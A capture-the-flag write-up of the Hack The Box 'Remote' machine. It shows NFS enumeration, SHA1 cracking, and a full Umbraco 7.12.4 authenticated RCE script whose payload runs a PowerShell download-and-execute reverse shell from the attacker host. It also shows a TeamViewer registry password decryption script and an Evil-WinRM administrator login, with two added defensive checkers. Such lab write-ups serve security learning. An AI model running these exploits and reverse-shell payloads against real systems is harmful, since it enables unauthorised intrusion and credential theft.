HackTheBox Writeup Remote

Hack The Box Writeup: Remote

After a long time, a new easy box has appeared on Hack The Box. Now “Easy” is a label that on previous machines could just as easily have been “Medium”, so it is always a surprise. In this case it really was a well-qualified machine that lived up to its name. The root flag was also reachable via a remote solution.

Hack The Box Remote Infocard

[0x1] Reconnaissance & Enumeration

The kickoff started with Nmap. The scan shows several interesting ports, such as 21 and 80, but especially 2049, the port used for NFS. Port 5985 is also open, which may mean that a WinRM connection can be used.

nmap -sC -sV -p- -oA remote_allports 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 13:57 GMT
Stats: 0:58:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 89.28% done; ETC: 15:02 (0:06:57 remaining)
Nmap scan report for 10.10.10.180
Host is up (0.077s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo: 
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m56s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2020-03-22T15:04:53
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3943.15 seconds

[0x2] Initial Foothold

Port 2049 is therefore used for NFS. This can mean access to a shared volume or folder, or a nicely constructed rabbit hole. I use showmount to view the available mount points.

showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

The mount point site_backups sounds interesting and is easy to mount onto an existing folder on my Parrot machine. In this case, I mount it at /tmp/htbremote so I can see what the content is.

mount -t nfs 10.10.10.180:/site_backups /tmp/htbremote

The listing of folders and files immediately shows what kind of website backup this is, namely the open-source content management system “Umbraco”.

ls -sla
total 119
 4 drwx------ 2 nobody 4294967294 4096 Feb 23 18:35 .
 0 drwxrwxrwt 1 root root 1324 Mar 22 18:57 ..
 1 drwx------ 2 nobody 4294967294 64 Feb 20 17:16 App_Browsers
 4 drwx------ 2 nobody 4294967294 4096 Feb 20 17:17 App_Data
 4 drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 App_Plugins
 1 drwx------ 2 nobody 4294967294 64 Feb 20 17:16 aspnet_client
48 drwx------ 2 nobody 4294967294 49152 Feb 20 17:16 bin
 8 drwx------ 2 nobody 4294967294 8192 Feb 20 17:16 Config
 1 drwx------ 2 nobody 4294967294 64 Feb 20 17:16 css
 1 -rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
 1 -rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
 4 drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Media
 1 drwx------ 2 nobody 4294967294 64 Feb 20 17:16 scripts
 8 drwx------ 2 nobody 4294967294 8192 Feb 20 17:16 Umbraco
 4 drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Umbraco_Client
 4 drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Views
28 -rwx------ 1 nobody 4294967294 28539 Feb 20 05:57 Web.config

While searching through one of the log files, I found a reference to the probable username of the Umbraco CMS admin user, namely admin@htb.local.

cat /tmp/htbremote/App_Data/Logs/UmbracoTraceLog.intranet.txt | grep user

2020-02-20 02:27:47,239 [P3592/D3/T44] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: User: admin@htb.local logged in from IP address 192.168.195.137

In the Web.config file, I found a connection string referring to Umbraco.SDF, a Microsoft SQL CE database used by the CMS. The file can be found in the App_Data folder and opened with a text editor. The content is poorly readable, but the snippet below could be extracted from it. The administrator is listed as Administrator with username admin and a SHA1 password hash: b8be16afba8c314ad33d812f22a04991b90e2aaa. For now, I have left ssmith for what it was.

Administrator admin b8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
ssmith ssmith@htb.local 8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.local
ssmith@htb.local

SHA1 hashes are easy to crack with Hashcat. The hash mode is -m 100, and with the rockyou wordlist I get the password back: baconandcheese.

hashcat -m 100 sha1_hash_admin /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 2048/4462 MB allocatable, 4MCU 

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1


Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese

Session..........: hashcat
Status...........: Cracked
Hash.Type........: SHA1
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Tue Mar 24 18:47:23 2020 (7 secs)
Time.Estimated...: Tue Mar 24 18:47:30 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1368.1 kH/s (0.37ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 9826304/14344385 (68.50%)
Rejected.........: 0/9826304 (0.00%)
Restore.Point....: 9822208/14344385 (68.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: badboi56 -> bacano1106

Started: Tue Mar 24 18:46:57 2020
Stopped: Tue Mar 24 18:47:31 2020
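As an added example (my own audit script, not code from the original post), the following parses the two membership records shown earlier and makes the difference between them concrete: the admin entry is an unsalted SHA1 digest, so checking a candidate password is a single hashlib call (what hashcat -m 100 does at scale), while the ssmith entry carries a per-user salt in front of an HMACSHA256 digest. It assumes Umbraco prefixes a 16-byte salt in base64 (24 characters) to the digest, and the known-weak password list is a constructed sample.

```python
import base64
import hashlib
import json
import re

# Constructed sample: the two records as they were pulled out of Umbraco.SDF
SAMPLE_RECORDS = [
    'Administrator admin b8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}',
    'ssmith ssmith@htb.local 8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA='
    '{"hashAlgorithm":"HMACSHA256"}ssmith@htb.local',
]

# name, login, stored password value, then the JSON blob naming the algorithm
RECORD_RE = re.compile(r'^(?P<name>\S+)\s+(?P<login>\S+)\s+(?P<stored>\S+?)(?P<meta>\{"hashAlgorithm":"[^"]+"\})')
SALT_B64_LEN = 24  # assumption: a 16-byte salt, base64-encoded, is prefixed to the digest


def parse_record(line):
    """Split one dumped record into name, login, algorithm, salt and digest bytes."""
    m = RECORD_RE.match(line)
    if not m:
        raise ValueError("unrecognised record: " + line)
    algo = json.loads(m.group("meta"))["hashAlgorithm"]
    stored = m.group("stored")
    rec = {"name": m.group("name"), "login": m.group("login"), "algorithm": algo}
    if algo == "SHA1":
        # Legacy format: bare hex SHA1 of the password, no salt at all
        rec.update(salt=None, digest=bytes.fromhex(stored), salted=False)
    else:
        rec.update(salt=base64.b64decode(stored[:SALT_B64_LEN]),
                   digest=base64.b64decode(stored[SALT_B64_LEN:]), salted=True)
    return rec


def matches_unsalted_sha1(rec, candidate):
    """One SHA1 per guess and no salt: every account with this password shares the digest."""
    if rec["algorithm"] != "SHA1":
        return None
    return hashlib.sha1(candidate.encode()).digest() == rec["digest"]


def audit(lines, known_weak):
    """Report each account's storage format and whether an unsalted hash is a known-weak password."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        status = "UNSALTED SHA1" if not rec["salted"] else "salted " + rec["algorithm"]
        hit = next((p for p in known_weak if matches_unsalted_sha1(rec, p)), None)
        findings.append((rec["login"], status, hit))
    return findings


if __name__ == "__main__":
    for login, status, hit in audit(SAMPLE_RECORDS, ["password", "baconandcheese"]):
        print(f"{login:20} {status:20} {'weak: ' + hit if hit else ''}")
```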

With the found username and password combination I try to access the Umbraco CMS to make sure they work.

The account details are correct! In the CMS you can see that version 7.12.4 is in use. Through Searchsploit I find a known exploit for this version of Umbraco.

[0x3] Path to User flag

searchsploit umbraco
------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title | Path
                                                                                     | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------- ----------------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | exploits/windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | exploits/aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | exploits/php/webapps/44988.txt
------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

The exploit needs an administrator account, which is convenient because I have just tested one and it works. I add the credentials to the exploit and choose to test whether the ping.exe command can reach my IP address.

# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A


import requests;

from bs4 import BeautifulSoup;

def print_dict(dico):
    print(dico.items());

print("Start");

# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "10.10.10.180"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "ping.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);

# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);

# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);

soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};

# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);

print("End");

Starting the exploit does not require any additional parameters, so it is nothing more than running 46153.py.

python 46153.py
Start
[]
End

I have tcpdump running to log incoming ICMP traffic, and indeed I get a ping on my machine from Remote.

tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
19:42:09.278662 IP 10.10.10.180 > 10.10.14.36: ICMP echo request, id 1, seq 9, length 40
19:42:09.278702 IP 10.10.14.36 > 10.10.10.180: ICMP echo reply, id 1, seq 9, length 40
19:42:10.281157 IP 10.10.10.180 > 10.10.14.36: ICMP echo request, id 1, seq 10, length 40
19:42:10.281210 IP 10.10.14.36 > 10.10.10.180: ICMP echo reply, id 1, seq 10, length 40
19:42:11.339095 IP 10.10.10.180 > 10.10.14.36: ICMP echo request, id 1, seq 11, length 40
19:42:11.339140 IP 10.10.14.36 > 10.10.10.180: ICMP echo reply, id 1, seq 11, length 40
19:42:12.311911 IP 10.10.10.180 > 10.10.14.36: ICMP echo request, id 1, seq 12, length 40
19:42:12.311978 IP 10.10.14.36 > 10.10.10.180: ICMP echo reply, id 1, seq 12, length 40

Now that the exploit works, it is just a matter of configuring another payload. I choose a PowerShell reverse shell and call it via a URL pointing to my own machine, so the exploit downloads the reverse shell, runs it and connects back to me.

payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "-c IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.36:8080/revshell.ps1\')"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';
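As an added defender-side example (my own code, not part of the original post or of 46153.py), the following check parses a submitted stylesheet and rejects exactly what the payloads above rely on: an msxsl:script block and an XPath call into the prefix it implements. In .NET the matching server-side fix is to load stylesheets with script support disabled (XsltSettings.EnableScript = false); the sample documents below are constructed from the write-up's ping payload and a harmless stylesheet.

```python
import re
import xml.etree.ElementTree as ET

MSXSL_NS = "urn:schemas-microsoft-com:xslt"

# Constructed sample: the ping stylesheet from the write-up, written out as one XML document
PING_PAYLOAD = (
    '<?xml version="1.0"?><xsl:stylesheet version="1.0" '
    'xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" '
    'xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">'
    '<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() '
    '{ string cmd = "10.10.10.180"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); '
    'proc.StartInfo.FileName = "ping.exe"; proc.StartInfo.Arguments = cmd; '
    'proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; '
    'proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } '
    '</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> '
    '</xsl:template> </xsl:stylesheet>'
)

# Constructed sample: a stylesheet that only uses built-in XPath functions
BENIGN_XSLT = (
    '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">'
    '<xsl:template match="/"><xsl:value-of select="count(//item)"/></xsl:template>'
    '</xsl:stylesheet>'
)

# A prefixed function call such as csharp_user:xml(); axes like child::node() do not match
EXT_CALL_RE = re.compile(r"\b[A-Za-z_][\w.-]*:[A-Za-z_][\w.-]*\s*\(")


def find_script_blocks(xslt_text):
    """Every msxsl:script element: the language, the prefix it implements and its source."""
    root = ET.fromstring(xslt_text)
    return [
        {"language": el.get("language"), "prefix": el.get("implements-prefix"),
         "source": (el.text or "").strip()}
        for el in root.iter(f"{{{MSXSL_NS}}}script")
    ]


def find_extension_calls(xslt_text):
    """XPath expressions (select/test/match attributes) that call a namespaced extension function."""
    root = ET.fromstring(xslt_text)
    calls = []
    for el in root.iter():
        for attr in ("select", "test", "match"):
            expr = el.get(attr)
            if expr and EXT_CALL_RE.search(expr):
                calls.append(expr)
    return calls


def is_safe(xslt_text):
    """True only if the stylesheet neither embeds script nor calls extension functions."""
    return not find_script_blocks(xslt_text) and not find_extension_calls(xslt_text)


if __name__ == "__main__":
    for name, doc in (("ping payload", PING_PAYLOAD), ("benign", BENIGN_XSLT)):
        print(name, "safe" if is_safe(doc) else "REJECT",
              [b["language"] for b in find_script_blocks(doc)], find_extension_calls(doc))
```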

To catch the session I start a netcat listener on port 1337. I use rlwrap so the limited shell gets a few more features, such as command history.

rlwrap netcat -lvnp 1337

Now that the listener is active, I start the exploit again with the new payload.

python 46153.py
Start
[]

The session comes in on the listener, and a quick whoami shows which account I am running as.

whoami
iis apppool\defaultapppool

The only other users are Administrator and Public. After a quick check, the latter contains the well-known user.txt.

cd Public
dir
    Directory: C:\users\Public


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d----- 3/26/2020 1:54 PM toto
d-r--- 9/15/2018 3:19 AM Videos
-a---- 3/26/2020 1:54 PM 7168 meter.win_x64_8091.exe
-ar--- 3/26/2020 11:11 AM 34 user.txt

Yep, this is the user flag. Now on to finding out how to get the root flag. Given the name of the box, it has something to do with remote access.

type user.txt
3b7ee5c22035fd364c11a4a32dceb3f3

[0x4] Path to Root flag

While searching the Program Files (x86) folder I come across the installation folder of TeamViewer. Now that is a product made for remote access 🙂

PS C:\windows\system32\inetsrv> cd c:\progra~2
PS C:\Program Files (x86)> dir
    Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
d----- 9/15/2018 3:28 AM Common Files 
d----- 9/15/2018 5:06 AM Internet Explorer 
d----- 2/23/2020 2:19 PM Microsoft SQL Server 
d----- 2/23/2020 2:15 PM Microsoft.NET 
d----- 2/19/2020 3:11 PM MSBuild 
d----- 2/19/2020 3:11 PM Reference Assemblies 
d----- 2/20/2020 2:14 AM TeamViewer 
d----- 9/15/2018 5:05 AM Windows Defender 
d----- 9/15/2018 3:19 AM Windows Mail 
d----- 10/29/2018 6:39 PM Windows Media Player 
d----- 9/15/2018 3:19 AM Windows Multimedia Platform 
d----- 9/15/2018 3:28 AM windows nt 
d----- 10/29/2018 6:39 PM Windows Photo Viewer 
d----- 9/15/2018 3:19 AM Windows Portable Devices 
d----- 9/15/2018 3:19 AM WindowsPowerShell 

Version 7 of TeamViewer is indeed installed on this box.

PS C:\Program Files (x86)\TeamViewer\Version7> dir

    Directory: C:\Program Files (x86)\TeamViewer\Version7

Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
d----- 2/20/2020 2:14 AM x64 
-a---- 8/7/2012 6:36 AM 8485 CopyRights.txt 
-a---- 9/12/2012 7:36 AM 29920 License.txt 
-a---- 5/29/2015 1:17 PM 8034096 TeamViewer.exe 
-a---- 3/30/2020 1:15 PM 201471 TeamViewer7_Logfile.log 
-a---- 2/27/2020 10:35 AM 1049114 TeamViewer7_Logfile_OLD.log 
-a---- 5/29/2015 1:17 PM 2286896 TeamViewer_Desktop.exe   
..
..

Recently a vulnerability was found and recorded as a CVE in the way TeamViewer stored its passwords in the registry. The AES key and IV were identical for every installation, which made it possible to decrypt the stored password. This allows remote script execution, but also privilege escalation if the administrator reused the password. I found the details in a blog post by Why Not Security, where a Python script with the exploit was also made available. All I need is the encrypted password.

In this case, the key should be under HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7. With REG QUERY I search in my session for the values shown below. It neatly says: SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B.

PS C:\windows\system32\inetsrv> REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
    StartMenuGroup REG_SZ TeamViewer 7
    InstallationDate REG_SZ 2020-02-20
    InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7
    Always_Online REG_DWORD 0x1
    Security_ActivateDirectIn REG_DWORD 0x0
    Version REG_SZ 7.0.43148
    ClientIC REG_DWORD 0x11f25831
    PK REG_BINARY BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B1
..[clip]..
B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
    SK REG_BINARY F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F6..[clip]..
0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
    LastMACUsed REG_MULTI_SZ \0005056B92FD5
    MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0}
    MIDVersion REG_DWORD 0x1
    ClientID REG_DWORD 0x6972e4aa
    CUse REG_DWORD 0x1
    LastUpdateCheck REG_DWORD 0x5e72893c
    UsageEnvironmentBackup REG_DWORD 0x1
    SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
    MultiPwdMgmtIDs REG_MULTI_SZ admin
    MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
    Security_PasswordStrength REG_DWORD 0x3
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7\AccessControl
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7\DefaultSettings

The Python script is simple and only requires the encrypted password from the registry. In this case, I use the SecurityPasswordAES value as hex_str_cipher. As you can see, the key and IV for the decryption are already known.

import binascii
import hexdump
from Crypto.Cipher import AES  # pycryptodome


class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        # AES-CBC with the key and IV that are the same for every TeamViewer installation
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)


key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"  # SecurityPasswordAES from the registry
ciphertext = binascii.unhexlify(hex_str_cipher)
raw_un = AESCipher(key).decrypt(iv, ciphertext)
# hexdump.hexdump() prints the buffer itself and returns None, hence the stray "None" in the output
print(hexdump.hexdump(raw_un))
# The plaintext is UTF-16LE text followed by null padding, which is stripped here
password = raw_un.decode('utf-16').rstrip('\x00')
print(password)

When I run the script, I get !R3m0te! back as the password. If the password has indeed been reused (a real-world scenario), I should be able to log in as Administrator with it.

python tv7.py 
00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
None
!R3m0te!

The Nmap scan already revealed that port 5985 is open, and with it the possibility of connecting via WinRM. For this I use Evil-WinRM with the username Administrator and the password !R3m0te!. This gives a successful login as Administrator.

evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!'
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator

*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
remote

Let’s go to the standard location for the root flag and tick off another machine. Remote is officially rooted.

C:\Users\Administrator\Documents> dir c:\users\Administrator\Desktop
    Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-ar--- 3/30/2020 1:15 PM 34 root.txt 
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
ed5fa1271e365bbeb44d34200b57f194


All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!

d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?
